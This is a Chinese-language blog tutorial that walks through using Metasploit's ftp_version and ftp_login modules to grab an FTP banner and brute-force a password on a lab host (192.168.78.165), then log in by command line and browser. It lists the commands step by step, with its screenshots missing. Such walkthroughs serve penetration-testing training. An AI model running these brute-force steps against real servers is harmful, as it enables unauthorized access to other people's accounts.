标签:service 用户名 back 主机 asp shadow lin 密码 框架
课前声明:3.1 运行ftp_version 漏洞利用框架,如下图所示。
命令:run
获取到FTP Banner 如下图所示:Microsoft FTP Service\x0d\x0a
3.2 返回 ftp_version漏洞框架的上一层,如下图所示。
命令:back
3.3 检索Metasploit(msf)框架对于ftp_login的漏洞模块,如下图所示。
命令:search ftp_login
3.4 利用见多到的ftp_login漏洞模块,如下图所示。
命令:use auxiliary/scanner/ftp/ftp_login
3.5 查看ftp_login漏洞利用模块的参数,如下图所示。
命令:show options
RHOSTS:受害者主机IP
THREADS:线程数
USERNAME:FTP用户名
PASS_FILE:密码文件
3.6 设置RHOSTS参数,如下图所示。
命令:set rhosts 192.168.78.165
3.7 设置USERNAME参数,如下图所示。
命令:set username test1
3.8 设置PASS_FILE参数,如下图所示。
命令:set pass_file /root/pass.txt
3.8 设置THREADS参数,如下图所示。
命令:set threads 5
在这里插入图片描述
3.9 查看参数配置结果(参数是否配置成功),如下图所示。
命令:show options
3.10 执行ftp_login漏洞利用模块,如下图所示。
命令:run
如下图所示,ftp服务暴力破解成功。
3.11 命令行远程登录ftp服务,如下图所示。
命令:ftp IP(ftp 192.168.78.165)
3.12 浏览器URL栏登录FTP服务,如下图所示。
步骤:URl栏输入ftp://IP 在弹出窗口利用破解到的账户信息登录。
3.13 浏览器登录FTP服务成功,如下图所示。
———————————————————完———————————————————
辛苦原创,你的每一次评论点赞和关注,都是我们源源不断的创作动力哦!你也可搜索:Kali与编程,学习更多Kali Linux***与白帽编程技巧呢!
点我学习更多Kali Linux***测试与网络***实战技巧请添加链接描述
网络安全工程师与白帽***教你:Kali Linux***与FTP服务器***实战
标签:service 用户名 back 主机 asp shadow lin 密码 框架
原文地址:https://blog.51cto.com/14308022/2539893